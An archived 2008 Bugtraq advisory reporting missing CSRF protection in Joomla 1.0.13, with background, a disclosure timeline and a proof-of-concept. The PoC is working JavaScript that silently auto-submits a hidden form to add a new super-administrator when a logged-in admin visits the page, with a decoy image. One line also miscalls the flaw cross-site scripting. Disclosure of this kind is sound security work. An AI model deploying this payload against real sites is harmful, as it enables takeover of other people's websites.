lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <4783BBF5.90601@menteslibres.org>
Date: Tue, 08 Jan 2008 12:07:49 -0600
From: "J. Carlos Nieto" <xiam@...teslibres.org>
To: bugtraq@...urityfocus.com
Subject: Joomla 1.0.13 CSRF

Author: Jose Carlos Nieto.

Date: Jan 08, 2008

Severity: Mild

There exists a Cross Site Scripting security hole in Joomla 1.0.13.


Background
==========

*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>.
Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.


Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.


Summary
=======
Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing
a specially crafted webpage containing an exploit, this exploit can execute (without permission)
any command the administrator would normally execute, such as publish a content or even add a new
administrator.


Solution
========
This problem has no solution at this time.


Disclosure timeline
===================
Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.


Proof of Concept
================

If a logged in administrator visits this page a new administrator will be added to the victim's
Joomla powered website.

---- exploit code ----

<script type="text/javascript">

window.onload = function() {

    var url = "http://joomlasite.com/joomla/administrator/index2.php";


    var gid = 25;

    var user = 'custom_username';

    var pass = 'custom_password';

    var email = 'joe_cool@...mple.com';

    var param = {

        name: user,

        username: user,

        email: email,

        password: pass,

        password2: pass,

        gid: gid,

        block: 0,

        option: 'com_users',

        task: 'save',

        sendEmail: 1

    };


    var form = document.createElement('form');

    form.action = url;

    form.method = 'post';

    form.target = 'hidden';

    form.style.display = 'none';


    for (var i in param) {

        try {

            // ie

            var input = document.createElement('<input name="'+i+'">');

        } catch(e) {

            // other browsers

            var input = document.createElement('input');

            input.name = i;

        }

        input.setAttribute('value',  param[i]);

        form.appendChild(input);

    }

    document.body.appendChild(form);


    form.submit();

}

</script>


<iframe name="hidden" style="display: none"></iframe>


<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">

---- exploit code ----


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ